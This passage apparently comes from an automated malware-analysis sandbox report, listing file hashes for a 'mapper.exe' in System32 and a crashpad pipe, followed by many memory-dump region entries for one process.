                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e791c02a1c32806c00c17d76d16d89a06713b66beecf51d644f47d9391f959f1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          6c3cfeb8949efe5a214b2ce1a910497c5189bab88cbdd3efb287e31f271782e13ca6c3c54342b809d28e99f898d60fc2b609e2fbb3a40a346b8f6f809082f90b

                                                                                                                                                                                                        • C:\Windows\System32\mapper.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          163KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0041a7d5d2f2f207579ebed379346d0c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          84d494a52ab9fdb21d0f0b380fe66e6d001b61c9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          12e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8

                                                                                                                                                                                                        • C:\Windows\System32\mapper.exe
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          163KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0041a7d5d2f2f207579ebed379346d0c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          84d494a52ab9fdb21d0f0b380fe66e6d001b61c9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          12e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8

                                                                                                                                                                                                        • \??\pipe\LOCAL\crashpad_5084_BKAPEHZAVCLEYMRS
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                        • memory/1984-149-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-393-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-150-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-152-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-151-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-134-0x00007FF627930000-0x00007FF62829C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9.4MB

                                                                                                                                                                                                        • memory/1984-148-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-146-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-147-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-145-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-144-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-249-0x00007FF627930000-0x00007FF62829C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9.4MB

                                                                                                                                                                                                        • memory/1984-143-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-142-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-141-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-140-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-139-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-369-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-370-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-371-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-138-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-153-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-394-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-395-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-137-0x00007FF627930000-0x00007FF62829C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9.4MB

                                                                                                                                                                                                        • memory/1984-136-0x00007FF627930000-0x00007FF62829C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9.4MB

                                                                                                                                                                                                        • memory/1984-135-0x00007FF627930000-0x00007FF62829C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9.4MB

                                                                                                                                                                                                        • memory/1984-401-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-402-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-403-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-404-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-405-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-406-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-407-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-408-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-409-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-410-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-412-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-413-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-411-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-414-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-415-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/1984-416-0x000001732AB70000-0x000001732AB71000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB